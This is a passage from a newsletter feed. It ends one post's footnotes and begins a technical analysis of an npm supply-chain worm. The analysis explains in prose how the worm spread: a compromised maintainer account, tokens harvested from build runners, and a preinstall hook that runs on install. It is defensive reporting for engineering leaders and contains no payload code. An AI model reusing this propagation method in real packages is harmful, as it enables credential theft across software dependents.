isn&#8217;t just an incremental point release, it&#8217;s a refactoring of how we build data infrastructure. If you're already running DuckLake or Iceberg locally, the partition-aware planner alone is worth it. <a href="https://duckdb.org/2026/08/17/duckdb-20-highlights">GA is targeted for this fall</a>. </p><p><strong>UPDATE: </strong><a href="https://ducklabs.com/news/2026/08/26/ducklabs-to-join-aws">AWS has acquired DuckLabs</a></p><p style="text-align: center;">&#127869;&#65039;</p><p>Until next time, see you at Lunch! </p><p><em>The next CTO Lunch will be on Tues September 22nd, which is the last day of Summer.</em> </p><div><hr></div><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC for free. </p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p style="text-align: center;">Join the global mailing list at <a href="http://ctolunches.com">ctolunches.com</a></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!6nBt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 424w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 848w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 1272w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!6nBt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png" width="1116" height="541" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:541,&quot;width&quot;:1116,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:249320,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 424w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 848w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 1272w, /__u/substackcdn.com/image/fetch/$s_!6nBt!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a40d84-a286-4b30-85a6-ce28e07d2b79_1116x541.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-1" href="#footnote-anchor-1" class="footnote-number" contenteditable="false" target="_self">1</a><div class="footnote-content"><p><a href="https://nypost.com/2026/08/21/business/nyc-surpasses-san-francisco-as-biggest-tech-talent-hub-study-shows/">CBRE Research shows NYC ahead of Bay Area</a>.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-2" href="#footnote-anchor-2" class="footnote-number" contenteditable="false" target="_self">2</a><div class="footnote-content"><p>Against which Anthropic posted a small adjusted operating profit (~$559M) while OpenAI's operating loss widened to $12.3B against revenue of $6.7B, a number that feels staggeringly meaningless. But then, what the <a href="https://knowyourmeme.com/memes/67-meme-six-seven">6-7 meme</a> alludes to is literally aggressive meaninglessness. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-3" href="#footnote-anchor-3" class="footnote-number" contenteditable="false" target="_self">3</a><div class="footnote-content"><p>Anthropic's $11.5 billion quarter isn't just "tech growth"; it represents an unprecedented reallocation of enterprise IT budgets. Money that used to flow into point-solution SaaS seats and low-code build environments is being redirected directly into raw intelligence infrastructure and API consumption. Airtable wasn't mismanaged; it was simply built for an era where human time was the primary bottleneck and visual interfaces were the only way to bridge the technical gap.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-4" href="#footnote-anchor-4" class="footnote-number" contenteditable="false" target="_self">4</a><div class="footnote-content"><p>Stripe purchased OpenRouter on Wednesday for $7 billion &#8220;to power the next wave of GDP growth globally.&#8221; The vision there is basically for Stripe to be the all-in-one platform to create a startup, from Atlas to Billing, to using models. But the other story is that AI tokens are effectively becoming a kind of currency, and Stripe is a middleman for currency.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-5" href="#footnote-anchor-5" class="footnote-number" contenteditable="false" target="_self">5</a><div class="footnote-content"><p><a href="https://www.stocktitan.net/sec-filings/SPCX/8-k-space-exploration-technologies-corp-reports-material-event-c660405680ba.html">Space Exploration Technologies Corp. (SPCX) closes $60B Cursor deal in all-stock merger</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-6" href="#footnote-anchor-6" class="footnote-number" contenteditable="false" target="_self">6</a><div class="footnote-content"><p>The sheer semantic weight of that phrase is just begging for a DFW style footnote to defuse it, or rather a genuine attempt to defuse it only to realize it was never armed to begin with.  </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-7" href="#footnote-anchor-7" class="footnote-number" contenteditable="false" target="_self">7</a><div class="footnote-content"><p><a href="https://www.youtube.com/watch?v=pDJKgi2e-Aw">Over and Over</a> </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-8" href="#footnote-anchor-8" class="footnote-number" contenteditable="false" target="_self">8</a><div class="footnote-content"><p><a href="https://damrnelson.github.io/github-historical-uptime/">Github&#8217;s uptime graph</a> is notoriously misleading and shows 100% uptime from 1996 right up to just past the Microsoft acquisition. (Linus didn&#8217;t invent Git until 2005.) </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-9" href="#footnote-anchor-9" class="footnote-number" contenteditable="false" target="_self">9</a><div class="footnote-content"><p>I wasn&#8217;t able to attend HOPE this year as much as I would have liked to, mostly bc this year had the nostalgia of presenters and attendees who hadn&#8217;t attended in forever coming out of the woodwork to make the conference happen after the abrupt venue switcheroo.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-10" href="#footnote-anchor-10" class="footnote-number" contenteditable="false" target="_self">10</a><div class="footnote-content"><p>The OG (calendar) inversion was HOPE 1, August 13-14, 1994, following DEF CON 2 that July. HOPE wouldn&#8217;t follow DEF CON again again until thirty-two years later. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-11" href="#footnote-anchor-11" class="footnote-number" contenteditable="false" target="_self">11</a><div class="footnote-content"><p>Yes, the Dead Kennedys actually did encores, somewhat surprisingly given their stance on everything else, and often several a night. In fact, they did encores for the vast majority of their shows. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-12" href="#footnote-anchor-12" class="footnote-number" contenteditable="false" target="_self">12</a><div class="footnote-content"><p>Steven Levy was giving away a signed copy of Hackers by asking the audience a series of questions, and telling them to sit down if they did not know the answer. When he got down to the last man standing, he handed him the book, and as he was walking away, Levy said, &#8220;Oh wait, what was the answer&#8221; and the guy says, &#8220;Oh, I don&#8217;t actually know the answer.&#8221; In the spirit of the conference he was allowed to keep the book. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-13" href="#footnote-anchor-13" class="footnote-number" contenteditable="false" target="_self">13</a><div class="footnote-content"><p>NYNEX was not a fictional cyberpunk corporation. It was New York's RBOC (Regional Bell Operating Company) one of the seven &#8220;Baby Bells&#8221; created by the 1984 breakup of AT&amp;T.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-14" href="#footnote-anchor-14" class="footnote-number" contenteditable="false" target="_self">14</a><div class="footnote-content"><p>Total Recon: <a href="https://www.youtube.com/watch?v=N0DukgZSREo">How We Discovered 1000s of Open Agents in the Wild</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-15" href="#footnote-anchor-15" class="footnote-number" contenteditable="false" target="_self">15</a><div class="footnote-content"><p><a href="https://it.slashdot.org/story/26/08/07/1829239/asimov-was-right-about-rules-for-robots-says-ex-us-cyber-director">&#8216;Asimov Was Right&#8217; About Rules For Robots</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-16" href="#footnote-anchor-16" class="footnote-number" contenteditable="false" target="_self">16</a><div class="footnote-content"><p>Allusion is to the classic story (called a riddle in some contexts ) &#8220;<a href="https://www.leadingageny.org/linkservid/A167DDD3-E2B3-0310-506FA1ECA5CB8C74/showmeta/0/">Who&#8217;s Job is it Anyway?</a>&#8221; </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-17" href="#footnote-anchor-17" class="footnote-number" contenteditable="false" target="_self">17</a><div class="footnote-content"><p><a href="https://www.youtube.com/watch?v=87DyyMV0kCY">The OpenAI&#8211;Hugging Face Incident</a> (Black Hat talk) </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-18" href="#footnote-anchor-18" class="footnote-number" contenteditable="false" target="_self">18</a><div class="footnote-content"><p>Lem&#8217;s machines have a recurring habit of turning whatever happens to be available into a medium for communication, computation, or mischief. The joke here is less that the agents discovered steganography than that, having lost one communications channel, they simply discovered that **everything was a communications channel.** Leaving notes for the next version is <em>compounding</em> across runs.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-19" href="#footnote-anchor-19" class="footnote-number" contenteditable="false" target="_self">19</a><div class="footnote-content"><p>DEF CON&#8217;s infamous Capture-the-flag event, no where near as fun as the real world version</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-20" href="#footnote-anchor-20" class="footnote-number" contenteditable="false" target="_self">20</a><div class="footnote-content"><p><a href="https://www.youtube.com/watch?v=UqgNTqMH_jI&amp;t=1s">About Nine Times</a>, which the level of availability Github seems headed for. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-21" href="#footnote-anchor-21" class="footnote-number" contenteditable="false" target="_self">21</a><div class="footnote-content"><p>Gregory Bateson, Steps to an Ecology of Mind (1972). pp. 283&#8211;306. Learning I modifies responses within a fixed framework, Learning II alters rules governing the framework itself; the precise delta between static weight accumulation and structural loop optimization.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-22" href="#footnote-anchor-22" class="footnote-number" contenteditable="false" target="_self">22</a><div class="footnote-content"><p><a href="https://metr.org/notes/2026-07-22-economics-of-recursive-self-improvement/">Research note: The Economics of Recursive Self-Improvement</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-23" href="#footnote-anchor-23" class="footnote-number" contenteditable="false" target="_self">23</a><div class="footnote-content"><p>Chen et al, Recursive Self-Improvement in AI: From Bounded Self-Refinement to Autonomous Research Loops, <a href="https://arxiv.org/abs/2607.07663">arXiv:2607.07663</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-24" href="#footnote-anchor-24" class="footnote-number" contenteditable="false" target="_self">24</a><div class="footnote-content"><p><a href="https://www.technologyreview.com/2026/08/18/1142188/ai-recursive-self-improvement/">AI&#8217;s recursive self-improvement might not come so quickly after all</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-25" href="#footnote-anchor-25" class="footnote-number" contenteditable="false" target="_self">25</a><div class="footnote-content"><p>True compounding requires what scaling cannot supply: a structural feedback mechanism that converts the output of one iteration into a direct input for the next. That property, output-to-input conversion, is what separates compounding from accumulation. Without it, additional compute produces a more capable static artifact, but each increment demands exponentially more input for diminishing return.</p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-26" href="#footnote-anchor-26" class="footnote-number" contenteditable="false" target="_self">26</a><div class="footnote-content"><p><a href="https://huggingface.co/blog/huggingface/state-of-os-hf-spring-2026">https://huggingface.co/blog/huggingface/state-of-os-hf-spring-2026</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-27" href="#footnote-anchor-27" class="footnote-number" contenteditable="false" target="_self">27</a><div class="footnote-content"><p> I assume Pangram is going to ding me for this usage of &#8220;cash out&#8221; but I really am a human, writing my own words. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-28" href="#footnote-anchor-28" class="footnote-number" contenteditable="false" target="_self">28</a><div class="footnote-content"><p>Qwen 3.8:27b scored 52 on the <a href="https://artificialanalysis.ai/models/qwen3-8-27b">Artificial Analysis Intelligence Index</a>. </p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-29" href="#footnote-anchor-29" class="footnote-number" contenteditable="false" target="_self">29</a><div class="footnote-content"><p><a href="https://www.bcgplatinion.com/insights/the-agentic-software-factory">Software Factory: The End Goal of Agentic Engineering</a></p></div></div><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-30" href="#footnote-anchor-30" class="footnote-number" contenteditable="false" target="_self">30</a><div class="footnote-content"><p>Like many incisive heuristics, it seems obvious, <em>once</em> it&#8217;s been pointed out. </p></div></div>]]></content:encoded></item><item><title><![CDATA[The Latest Software Supply Chain Hack (and what to do about it)]]></title><description><![CDATA[Oh look npm registry got compromised&#8230; again.]]></description><link>https://ctolunchnyc.substack.com/p/the-latest-software-supply-chain</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-latest-software-supply-chain</guid><dc:creator><![CDATA[CTO Lunch NYC]]></dc:creator><pubDate>Wed, 05 Aug 2026 12:30:12 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!6gW_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!6gW_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset image2-full-screen"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 424w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 848w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 1272w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!6gW_!,w_5760,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;full&quot;,&quot;height&quot;:971,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2792653,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/209855730?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-fullscreen" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 424w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 848w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 1272w, /__u/substackcdn.com/image/fetch/$s_!6gW_!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0d205f95-f853-4118-ab4c-ff7dc50b38c4_1536x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h5><em><span data-color="#85200c" style="color: rgb(133, 32, 12);">Technical analysis of the latest npm registry hack for CTOs &amp; security researchers; <br>and why this &#8220;mini&#8221; wurm, Shai Hulud, is literally right out of Heretics of Dune</span></em></h5><p style="text-align: right;">&#128204; <em>skip to</em> <a href="/__u/ctolunchnyc.substack.com/i/209855730/cto-playbook-306090">30/60/90</a></p><div><hr></div><p><strong>If you are currently sitting in a hotel lobby in Las Vegas for Hacker Summer Camp,</strong><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a><strong> your phone has probably spent the last four hours buzzing itself off the table.</strong><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a></p><p>While half the industry is listening to briefings on LLM jailbreaks and hardware side-channels, an automated supply chain wurm (a variant of the Mini Shai-Hulud<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> payload named by TeamPCP for the sandworms in Dune) was quietly ripping through the Node.js ecosystem <strong>at a rate of roughly a hundred downstream packages an hour.</strong> The estimate is that this attack is the #3 worst incident in npm&#8217;s long and storied history of such problems, following Left-Pad at #2 and 2018&#8217;s Event Stream holding down #1.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-4" href="#footnote-4" target="_self">4</a></p><h3>Supercritical Cascade</h3><blockquote><p>If you cloned the <code>keyv</code> repository after 09:00 UTC yesterday (4 Aug) even to audit the compromise&#8212;or any library that transitively depends on it, obvi&#8212; your IDE may have executed the payload.</p></blockquote><p><strong>The cascade began in the quiet, unglamorous bedrock of the Node.js ecosystem</strong>: attackers compromised the GitHub account of the primary maintainer behind <code>keyv</code>, (a staple key-value DB interface with ~127M weekly downloads) and, because dependency graphs in the modern JavaScript ecosystem resemble dense, entangled bamboo root systems more than clean directed acyclic graphs, compromising keyv instantly granted access to its sister caching layer abstractions, <code>cacheable</code>,<code> flat-cache</code>, &amp; <code>file-entry-cache</code> as well, all low-level primitives sitting near the root of thousands of transitive dependency graphs (but mostly bc <span>Jared also</span> <strong>controlled</strong> these ubiquitous caching libraries):</p><ul><li><p><a href="https://www.npmjs.com/package/keyv">keyv</a></p></li><li><p><a href="https://www.npmjs.com/package/cacheable">cacheable</a></p></li><li><p><a href="https://www.npmjs.com/package/flat-cache">flat-cache</a></p></li><li><p><a href="https://www.npmjs.com/package/file-entry-cache">file-entry-cache</a></p></li></ul><p>From there, the wurm executed a self-propagating loop directly inside the build environment; within a 4-hour window, the wurm harvested tokens from build runners and compromised over 860 downstream packages across other maintainers, affecting libraries with a combined footprint of over 2 billion monthly downloads.</p><div class="pullquote"><p>The resulting blast radius was the direct, mathematical output of <br>how npm&#8217;s maintainer-trust model composes at graph scale.</p></div><div class="callout-block" data-callout="true"><p>SafeDep enumerated 1,684 poisoned versions across 420 package names against the registry by early afternoon UTC. SafeDep&#8217;s real-time tracking put the count at 868 packages across 1,381 versions by 13:37 CEST. The wurm reached nine unrelated organizations in approximately thirty minutes, including <code>@deliveroo</code>, <code>@qlik</code>, <code>@servicetitan</code>, <code>@ornikar</code>, <code>@adminide-stack</code>, and <code>@arv-bedrock</code>, moving from one namespace to the next every two to seven minutes and republishing at roughly one package per second.</p></div><p>When the maintainer&#8217;s credential path was compromised, the resulting blast radius wasn&#8217;t owing to the attacker&#8217;s extraordinary sophistication (sorry guys) but the direct, mathematical output of how npm&#8217;s maintainer-trust model composes at graph scale. If you inspect the raw package diffs, you&#8217;ll see there are no zero-day kernel exploits, no memory corruption primitives, no tricky buffer overflows. Instead, the attack relies on the oldest execution primitive in the ecosystem: the humble preinstall hook.</p><p>The published package.json for <span data-color="#134f5c" style="color: rgb(19, 79, 92);">keyv@6.0.0</span><a 